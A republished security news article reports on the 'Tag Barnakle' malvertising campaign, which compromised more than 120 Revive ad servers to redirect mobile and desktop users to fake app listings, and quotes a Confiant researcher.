120 Compromised Ad Servers Target Millions of Internet Users


Compromised Ad Servers

An ongoing malvertising campaign tracked as “Tag Barnakle” has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware.

Unlike other operators who set about their task by infiltrating the ad-tech ecosystem using “convincing personas” to buy space on legitimate websites for running the malicious ads, Tag Barnakle is “able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure,” said Confiant security researcher Eliya Stein in a Monday write-up.

password auditor

The development follows a year after the Tag Barnakle actor was found to have compromised nearly 60 ad servers in April 2020, with the infections primarily targeting an open-source advertising server called Revive.

The latest slew of attacks is no different, although the adversaries appear to have upgraded their tools to target mobile devices as well. “Tag Barnakle is now pushing mobile targeted campaigns, whereas last year they were happy to take on desktop traffic,” Stein said.

Compromised Ad Servers

Specifically, the websites that receive an ad through a hacked server carries out client-side fingerprinting to deliver a second-stage JavaScript payload — click tracker ads — when certain checks are satisfied, that then redirect users to malicious websites, aiming to lure the visitors to an app store listing for fake security, safety, or VPN apps, which come with hidden subscription costs or hijack the traffic for other nefarious purposes.

password auditor

Given that Revive is used by a good number of ad platforms and media companies, Confiant pegs the reach of Tag Barnakle in the range of “tens if not hundreds of millions of devices.”

“This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence,” Stein said.





Source link

Mourad ELGORMA

Mourad ELGORMA

Fondateur de summarynetworks, passionné des nouvelles technologies et des métiers de Réseautique , Master en réseaux et système de télécommunications. ,j’ai affaire à Pascal, Delphi, Java, MATLAB, php …Connaissance du protocole TCP / IP, des applications Ethernet, des WLAN …Planification, installation et dépannage de problèmes de réseau informatique……Installez, configurez et dépannez les périphériques Cisco IOS. Surveillez les performances du réseau et isolez les défaillances du réseau. VLANs, protocoles de routage (RIPv2, EIGRP, OSPF.)…..Manipuler des systèmes embarqués (matériel et logiciel ex: Beaglebone Black)…Linux (Ubuntu, kali, serveur Mandriva Fedora, …). Microsoft (Windows, Windows Server 2003). ……Paquet tracer, GNS3, VMware Workstation, Virtual Box, Filezilla (client / serveur), EasyPhp, serveur Wamp,Le système de gestion WORDPRESS………Installation des caméras de surveillance ( technologie hikvision DVR………..). ,

Laisser un commentaire